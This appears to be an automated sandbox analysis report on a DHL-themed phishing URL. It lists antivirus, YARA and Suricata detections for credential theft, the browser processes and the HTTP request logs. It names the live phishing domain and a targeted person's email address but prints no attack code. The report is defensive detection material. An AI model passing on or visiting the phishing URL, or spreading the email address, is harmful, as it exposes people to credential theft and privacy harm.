Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com

Overview

General Information

Sample URL:https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com
Analysis ID:1582581
Infos:

Detection

HTMLPhisher
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
AI detected suspicious Javascript
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Suricata IDS alerts with low severity for network traffic
URL contains potential PII (phishing indication)

Classification

  • System is w10x64
  • chrome.exe (PID: 2300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2004,i,16542891561476975858,14649593030088590238,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6512 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_68JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    1.5.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        1.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-30T22:42:33.108771+010020325172Possible Social Engineering Attempted188.114.96.3443192.168.2.458483TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-30T22:42:53.737599+010020377881Successful Credential Theft Detected188.114.96.3443192.168.2.458532TCP
          2024-12-30T22:43:05.564902+010020377881Successful Credential Theft Detected188.114.96.3443192.168.2.458556TCP
          2024-12-30T22:43:17.968046+010020377881Successful Credential Theft Detected188.114.96.3443192.168.2.458640TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-30T22:42:53.737414+010028478191Successful Credential Theft Detected192.168.2.458532188.114.96.3443TCP
          2024-12-30T22:43:05.564890+010028478191Successful Credential Theft Detected192.168.2.458556188.114.96.3443TCP
          2024-12-30T22:43:17.967837+010028478191Successful Credential Theft Detected192.168.2.458640188.114.96.3443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comAvira URL Cloud: detection malicious, Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/jquery.menu.cssAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_checked_focused.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/next.phpAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_checked.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/jquery-ui.structure.cssAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/Avira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_not_checked_focused.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/meBubble.cssAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/cdn-cgi/challenge-platform/h/b/flow/ov1/609964090:1735593069:6S3mpcqO1yILRgRXR0r0LjFCdbuSQ6cKt2unSWD0J4k/8fa532e0b89f421c/dHIAaNc3bgCsR5oKktnuJUphJqwfqu4osOi9Cn9zUWA-1735594936-1.2.1.1-hiLPnWAup5QiMMcYkqUgFSk0FeMKxRz.fwU8WEyUnAyFUxQygxfL_SCRekIkX5hPAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_emptyall_focused.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/_.cssAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/axit-jquery.datepicker.cssAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/loginPage18.cssAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_not_checked.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_sthischecked_focused.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_all_focused.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_all.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/favicon.icoAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/jquery-ui.theme.cssAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_sthischecked.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_not_checked_required_focused.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/login.cssAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/axit-jquery.autocomplete.cssAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/bg.jpgAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_radio_checked.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_radio_checked_focused.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_emptyall.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8fa532e0b89f421cAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_not_checked_required.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_radio_empty_focused.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/axit-jquery.dialog.cssAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_radio_empty.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_sthischeckedall_focused.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/mePanel.cssAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_all_sthischecked.pngAvira URL Cloud: Label: phishing
          Source: https://bs32c.golfercaps.com/vfd23ced/assets/image.pngAvira URL Cloud: Label: phishing

          Phishing

          barindex
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comJoe Sandbox AI: Score: 9 Reasons: The brand 'DHL' is a well-known international logistics company., The legitimate domain for DHL is 'dhl.com'., The provided URL 'bs32c.golfercaps.com' does not match the legitimate domain for DHL., The domain 'golfercaps.com' is unrelated to DHL and appears suspicious., The subdomain 'bs32c' does not provide any indication of legitimacy related to DHL., The URL structure suggests a potential phishing attempt as it does not align with the known domain for DHL. DOM: 1.3.pages.csv
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comJoe Sandbox AI: Score: 9 Reasons: The brand 'DHL' is a well-known international logistics company., The URL 'bs32c.golfercaps.com' does not match the legitimate domain 'dhl.com'., The domain 'golfercaps.com' is unrelated to DHL and is suspicious., The subdomain 'bs32c' and the main domain 'golfercaps.com' do not have any known association with DHL., The presence of an unrelated domain name is a common phishing tactic. DOM: 1.4.pages.csv
          Source: Yara matchFile source: 1.5.pages.csv, type: HTML
          Source: Yara matchFile source: 1.4.pages.csv, type: HTML
          Source: Yara matchFile source: 1.3.pages.csv, type: HTML
          Source: Yara matchFile source: dropped/chromecache_68, type: DROPPED
          Source: 0.10.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://bs32c.golfercaps.com/vfd23ced/#sean@virtua... The script demonstrates several high-risk behaviors, including data exfiltration, redirects to suspicious domains, and potential credential harvesting. While some contextual factors, such as the use of a known domain (DHL), may suggest legitimate intent, the overall behavior of the script is highly suspicious and poses a significant security risk.
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comHTTP Parser: Number of links: 0
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comHTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comHTTP Parser: Title: DHL does not match URL
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comSample URL: PII: sean@virtualintelligencebriefing.com
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comHTTP Parser: <input type="password" .../> found
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comHTTP Parser: No favicon
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comHTTP Parser: No favicon
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comHTTP Parser: No favicon
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comHTTP Parser: No favicon
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comHTTP Parser: No favicon
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comHTTP Parser: No <meta name="author".. found
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comHTTP Parser: No <meta name="author".. found
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comHTTP Parser: No <meta name="author".. found
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comHTTP Parser: No <meta name="copyright".. found
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comHTTP Parser: No <meta name="copyright".. found
          Source: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comHTTP Parser: No <meta name="copyright".. found

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:58640 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:58556 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2037788 - Severity 1 - ET PHISHING Successful Office 365 Phish 2022-07-19 : 188.114.96.3:443 -> 192.168.2.4:58640
          Source: Network trafficSuricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:58532 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2037788 - Severity 1 - ET PHISHING Successful Office 365 Phish 2022-07-19 : 188.114.96.3:443 -> 192.168.2.4:58556
          Source: Network trafficSuricata IDS: 2037788 - Severity 1 - ET PHISHING Successful Office 365 Phish 2022-07-19 : 188.114.96.3:443 -> 192.168.2.4:58532
          Source: global trafficTCP traffic: 192.168.2.4:58477 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2032516 - Severity 2 - ET PHISHING Generic Multibrand NewInjection Phishing Landing Template : 188.114.96.3:443 -> 192.168.2.4:58483
          Source: Network trafficSuricata IDS: 2032517 - Severity 2 - ET PHISHING Generic Multibrand NewInjection Phishing Landing Template : 188.114.96.3:443 -> 192.168.2.4:58483
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /vfd23ced/ HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /vfd23ced/ HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8fa532e0b89f421c HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bs32c.golfercaps.com/vfd23ced/?__cf_chl_rt_tk=.t4_fTJ6..fLu83eCFtwRHaH9sSWM82a2A3hSooL1N8-1735594936-1.0.1.1-2NnitAHUkIRWasCED.LdyHmLvy_cTl17DXqwUbIw_u0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js?onload=WXqDk4&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bs32c.golfercaps.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8fa532e0b89f421c HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js?onload=WXqDk4&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vopiq/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/609964090:1735593069:6S3mpcqO1yILRgRXR0r0LjFCdbuSQ6cKt2unSWD0J4k/8fa532e0b89f421c/dHIAaNc3bgCsR5oKktnuJUphJqwfqu4osOi9Cn9zUWA-1735594936-1.2.1.1-hiLPnWAup5QiMMcYkqUgFSk0FeMKxRz.fwU8WEyUnAyFUxQygxfL_SCRekIkX5hP HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8fa532ef18b9435c&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vopiq/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vopiq/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8fa532ef18b9435c&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8fa532ef18b9435c/1735594940553/NTUnkiFwsG_vUbH HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vopiq/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/404157209:1735593090:PkZ6LfythNHPr79mCMt43ygV4Jt_HfPkfi_yir-aMeY/8fa532ef18b9435c/c5n.2QPsOfIcLwMXbdQYrbHlLiukXQ1i_.C1_tbXgow-1735594938-1.1.1.1-YpojflswdDcU2Qa5EQBSQn7CvS2Y13qHu8rjKzZWOLrUr9SVmp.uSlaks2qKCMkH HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8fa532ef18b9435c/1735594940553/NTUnkiFwsG_vUbH HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
